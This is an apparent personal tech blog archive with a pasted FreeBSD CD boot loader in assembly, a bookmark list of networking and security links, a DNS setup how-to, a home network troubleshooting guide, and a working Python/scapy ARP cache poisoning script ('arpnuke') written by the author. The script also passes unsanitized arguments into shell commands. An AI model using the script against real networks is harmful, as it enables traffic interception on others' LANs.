Wednesday, June 13, 2012

# # Copyright (c) 2001 John Baldwin # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the author nor the names of any co-contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS # OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) # HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY # OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF # SUCH DAMAGE. # # $FreeBSD: release/9.0.0/sys/boot/i386/cdboot/cdboot.s 219126 2011-03-01 11:47:51Z brucec $ # # a.out header fields # .set AOUT_TEXT,0x04 # text segment size .set AOUT_DATA,0x08 # data segment size .set AOUT_BSS,0x0c # zero'd BSS size .set AOUT_SYMBOLS,0x10 # symbol table .set AOUT_ENTRY,0x14 # entry point .set AOUT_HEADER,MEM_PAGE_SIZE # size of the a.out header # # Constants for reading from the CD. # .set ERROR_TIMEOUT,0x80 # BIOS timeout on read .set NUM_RETRIES,3 # Num times to retry .set SECTOR_SIZE,0x800 # size of a sector .set SECTOR_SHIFT,11 # number of place to shift .set BUFFER_LEN,0x100 # number of sectors in buffer .set MAX_READ,0x10000 # max we can read at a time .set MAX_READ_SEC,MAX_READ >> SECTOR_SHIFT .set MEM_READ_BUFFER,0x9000 # buffer to read from CD .set MEM_VOLDESC,MEM_READ_BUFFER # volume descriptor .set MEM_DIR,MEM_VOLDESC+SECTOR_SIZE # Lookup buffer .set VOLDESC_LBA,0x10 # LBA of vol descriptor .set VD_PRIMARY,1 # Primary VD .set VD_END,255 # VD Terminator .set VD_ROOTDIR,156 # Offset of Root Dir Record .set DIR_LEN,0 # Offset of Dir Record length .set DIR_EA_LEN,1 # Offset of EA length .set DIR_EXTENT,2 # Offset of 64-bit LBA .set DIR_SIZE,10 # Offset of 64-bit length .set DIR_NAMELEN,32 # Offset of 8-bit name len .set DIR_NAME,33 # Offset of dir name # # We expect to be loaded by the BIOS at 0x7c00 (standard boot loader entry # point) # .code16 .globl start .org 0x0, 0x0 # # Program start. # start: cld # string ops inc xor %ax,%ax # zero %ax mov %ax,%ss # setup the mov $start,%sp # stack mov %ax,%ds # setup the mov %ax,%es # data segments mov %dl,drive # Save BIOS boot device # # Load Volume Descriptor # mov $VOLDESC_LBA,%eax # Set LBA of first VD load_vd: push %eax # Save %eax mov $1,%dh # One sector mov $MEM_VOLDESC,%ebx # Destination call read # Read it in cmpb $VD_PRIMARY,(%bx) # Primary VD? je have_vd # Yes pop %eax # Prepare to inc %eax # try next cmpb $VD_END,(%bx) # Last VD? jne load_vd # No, read next have_vd: # Have Primary VD # # Try to look up the loader binary using the paths in the loader_paths # array. # mov $loader_strings,%si # Point to start of array lookup_path: push %si # Save file name pointer call lookup # Try to find file pop %di # Restore file name pointer jnc lookup_found # Found this file xor %al,%al # Look for next mov $0xffff,%cx # path name by repnz # scanning for scasb # nul char mov %di,%si # Point %si at next path mov (%si),%al # Get first char of next path or %al,%al # Is it double nul? jnz lookup_path # No, try it. lookup_found: # Found a loader file # # Load the binary into the buffer. Due to real mode addressing limitations # we have to read it in 64k chunks. # mov DIR_SIZE(%bx),%eax # Read file length add $SECTOR_SIZE-1,%eax # Convert length to sectors shr $SECTOR_SHIFT,%eax cmp $BUFFER_LEN,%eax jbe load_sizeok mov $msg_load2big,%si # Error message call error load_sizeok: movzbw %al,%cx # Num sectors to read mov DIR_EXTENT(%bx),%eax # Load extent xor %edx,%edx mov DIR_EA_LEN(%bx),%dl add %edx,%eax # Skip extended mov $MEM_READ_BUFFER,%ebx # Read into the buffer load_loop: mov %cl,%dh cmp $MAX_READ_SEC,%cl # Truncate to max read size jbe load_notrunc mov $MAX_READ_SEC,%dh load_notrunc: sub %dh,%cl # Update count push %eax # Save call read # Read it in pop %eax # Restore add $MAX_READ_SEC,%eax # Update LBA add $MAX_READ,%ebx # Update dest addr jcxz load_done # Done? jmp load_loop # Keep going load_done: # # Lookup the file in the path at [SI] from the root directory. # lookup: mov $VD_ROOTDIR+MEM_VOLDESC,%bx # Root directory record mov DIR_EXTENT(%bx),rec_lba mov DIR_SIZE(%bx),rec_size mov $rec_size,%eax # Set LBA of root dir push %eax # Save %eax mov $1,%dh mov $MEM_VOLDESC,%ebx # Destination # # Load DH sectors starting at LBA EAX into [EBX]. # # Trashes: EAX # read: push %si # Save push %cx # Save since some BIOSs trash mov %eax,edd_lba # LBA to read from mov %ebx,%eax # Convert address shr $4,%eax # to segment mov %ax,edd_addr+0x2 # and store push %dx # Save mov $edd_packet,%si # Address Packet mov %dh,edd_len # Set length mov drive,%dl # BIOS Device mov $0x42,%ah # BIOS: Extended Read int $0x13 # Call BIOS pop %dx # Restore pop %cx # Restore pop %si ret # Return # # EDD Packet # edd_packet: .byte 0x10 # Length .byte 0 # Reserved edd_len: .byte 0x0 # Num to read .byte 0 # Reserved edd_addr: .word 0x0,0x0 # Seg:Off edd_lba: .quad 0x0 # LBA drive: .byte 0 # # State for searching dir # rec_lba: .long 0x0 # LBA (adjusted for EA) rec_size: .long 0x0 # File size loader_strings: .asciz "LOADER" .asciz "loader" .byte 0

Monday, July 12, 2010

Tech Links




Here is my bookmark list. All of these links have something to do with networking, security, linux, web development or technology in general. I apologize that it isn't very organized but the information contained within them is very useful for learning about network administration.


Hak5 – Technolust since 2005
IANA — Internet Assigned Numbers Authority
Internet Engineering Task Force
US-CERT: United States Computer Emergency Readiness Team
SecurityFocus
DEF CON® Hacking Conference - The Hacker Community's Foremost Social Network.
Technology News, Analysis, Comments and Product Reviews for IT Professionals | ZDNet
Default Password List
Android Developers
W3Schools Online Web Tutorials
Color Scheme Designer 3
Typetester – Compare fonts for the screen
Tactile 3D Interface - Software to browse, explore, and organize your file-system in 3D.
Oculis Labs, PrivateEye
.:: Phrack Magazine ::.
Security - Keylogging
Testing and reviews of keyloggers, monitoring products and spy software (spyware) 2009
Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc
What’s My Pass? » The Top 500 Worst Passwords of All Time
List of Free Proxy Servers - Page 1 of 9
bh-us-03-willis.pdf (application/pdf Object)
Welcome to The TCP/IP Guide!
Welcome to ScapyĆ¢€™s documentation! — Scapy v2.1.1-dev documentation
Internet Protocol Suite - Wikipedia, the free encyclopedia
SCAPY packet-crafting reference
Usage — Scapy v2.1.1-dev documentation
TCP Exploits by Prabhaker Mateti
TCP, Transmission Control Protocol
ARP spoofing - Wikipedia, the free encyclopedia
HEXADECIMAL to BINARY conversion, HEX to Decimal converter, Hexdecimal convertor
Cracking_Passwords_Guide.pdf (application/pdf Object)
PF: The OpenBSD Packet Filter
YouTube - SSL Strip
Moxie Marlinspike >> Software
PORTKNOCKING - A system for stealthy authentication across closed ports. : ABOUT : summary
HOWTO: Internet sharing with Ubuntu (NAT Gateway) - Ubuntu Forums
Paper: Kr3w's Cross-Site Scripting Tutorial | Articles | XSSed.com
SANS: Top Cyber Security Risks - Executive Summary
IT Security Magazine - Hakin9 www.hakin9.org
Black Hat ® Technical Security Conference // Home
2.1. Address Resolution Protocol (ARP)
Getting MAC address from a network interface
List of TCP and UDP port numbers - Wikipedia, the free encyclopedia
Wireshark · OUI Lookup Tool
Ethernet Type Codes
Multiple network interfaces and ARP flux - OpenVZ Wiki
arp(7): ARP kernel module - Linux man page
Section 27.6.  Neighbor Deletion
OReilly.Understanding.Linux.Network.Internals.Dec.2005
http://www.etpenguin.com/pub/Reference/DOC_arp.txt
http://tools.made-it.com/haring/desc.html
IRC - Linux Kernel Newbies
PLUG - Home
arp_accept | LinuxInsight
Arpwatch
git.kernel.org - linux/kernel/git/stable/linux-2.6.34.y.git/blob - Documentation/networking/ip-sysctl.txt
.::ArpON::.
CAM Table Overflow - Hakipedia
Defcon 15 - T364 LAN Protocol Attacks Part 1 - Arp Reloaded
Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger
Free Webmaster Tools & Search Engine Optimization Tools
Geotool
Domain Tools: Whois Lookup and Domain Suggestions
IHS | Home of Johnny Long and Hackers for Charity, Inc
Snort :: Docs
Offensive Computing | Community Malicious code research and analysis
Wirelessdefence.org
www.dd-wrt.com | Unleash Your Router
Programming with pcap
http://www.secdev.org/projects/scapy/files/scapydoc.pdf
DigiNinja
YouTube - Hacking wireless networks with Man in the Middle attacks

ARP Cache Poisoning

Here is a simple script I wrote in python. It performs an ARP poisoning attack by sending a forged ARP request packet.
The syntax is "arpnuke [interface] [victim IP] [IP to masquerade as]"
For it to work it must be run as root and scapy must be installed.
The best way to mitigate this attack is with static ARP tables. See the man page for arp and the ifconfig -arp option for more info.


#!/usr/bin/python

import sys
from scapy.all import Ether,ARP,conf,sendp
import os

interface = sys.argv[1]
victim = sys.argv[2]
identity = sys.argv[3]
conf.iface = interface
print conf.iface

if (os.system('cat /proc/net/arp | grep ' + victim)):
      os.system('arping -f -I ' + interface + ' ' + victim)

def local_mac(iface):
      os.system('touch /tmp/.arpnuketmp')
      os.system('ifconfig ' + iface + ' | grep HWaddr | cut -d" " -f11 > /tmp/.arpnuketmp')
      f = open('/tmp/.arpnuketmp', 'r')
      return f.readline()[:-1]
      f.close()

def neigh_mac(ip):
      os.system('touch /tmp/.arpnuketmp')
      os.system('arp -na | grep ' + ip + ' | cut -d" " -f4 > /tmp/.arpnuketmp')
      f = open('/tmp/.arpnuketmp', 'r')
      return f.readline()[:-1]
      f.close()

destmac = neigh_mac(victim)
srcmac = local_mac(interface)
ether = Ether(dst=destmac, src=srcmac, type=0x806)
arp = ARP(hwsrc=srcmac, psrc=identity, hwdst=destmac, pdst=victim, op=1)

sendp(ether/arp)

Monday, February 15, 2010

HOWTO configure client-side DNS (windows)

STEP 1
Right click on the networking icon in the bottom right and select "Open Network Connections" or go "Control-panel > Network and Internet Connections > Network Connections"



STEP 2
Right click on the desired network connection and click "properties"


STEP 3
Select "Internet Protocol (TCP/IP)" or "Internet Protocol version 4 (TCP/IP)" and click "properties"


STEP 4
Change "Obtain DNS server address automatically" to "use the following DNS server addresses" and then enter the IP address(es) of your DNS server(s). Preferred will be queried first and if it is down then secondary will be queried instead. Only preferred is required.


STEP 5
Reconnect to the network and use "nslookup 'some.domain.name'" Your new server should be displayed under Server and Address as in the picture below. If settings still havent changed try rebooting system.

Friday, February 5, 2010

Basic Home Network Troubleshooting Tutorial.

This is just a simple guide to help fix most network problems. It doesn't cover installing NIC drivers, configuring DNS, or the very basics such as how to connect to a network. This is just here to give you some steps to take before you decide to call up your ISP and ask for further assistance.

STEP 1

Restart your browser and try visiting other websites. Are you able to go to visit other sites or are you still receiving the same error?
If other sites work then the website you were trying to visit is down. Otherwise move on to step 2.


STEP 2

Is your computer connected to your router? There are two ways this can be done; wireless or with an ethernet cable. Ethernet cables are usually blue and the ends look like phone jacks. Make sure the cable or wireless adapter is plugged in all the way and isn't loose.
Here are some examples of wireless adapters:



STEP 3


Unplug both your modem and your router from their power source. The modem is the device that either plugs into the wall via a phone line or a coax cable (the same kind of cable that your TV plugs into the wall with). The only connection between the router and the wall is the power cable. Now would be a good time to make sure the router is connected to the modem, there should be a cable going from the modem into a slot on the back of the router labeled "WAN". Wait 1 minute and then plug the power back into the modem. Now wait 2 more minutes and then plug the power back into the router. Wait another minute and then reboot your computer.


STEP 4

Test connectivity between your computer and your router. To do this open the command prompt by clicking "Start > Run" and then enter "cmd" or "cmd.exe" and press enter. Type "ipconfig" in to the black window that pops up.


Now make note of the "Default Gateway", in this photo it would be "10.0.0.1" Now try to "ping" the router by entering the command "ping ". So in my case I would type in "ping 10.0.0.1" and would get something like the following, replacing the "google.com" with your default gateway:


The second section indicated by the red box that says "Packets: Sent" shows you whether your ping requests are able to reach the router. If you are sending 4 and receiving 0 then there is a connection problem between your computer and your router.

Here are some other good links:
http://www.microsoft.com/windowsxp/using/networking/setup/wireless.mspx
http://support.microsoft.com/kb/928429
http://searchnetworking.techtarget.com/news/article/0,289142,sid7_gci945257,00.html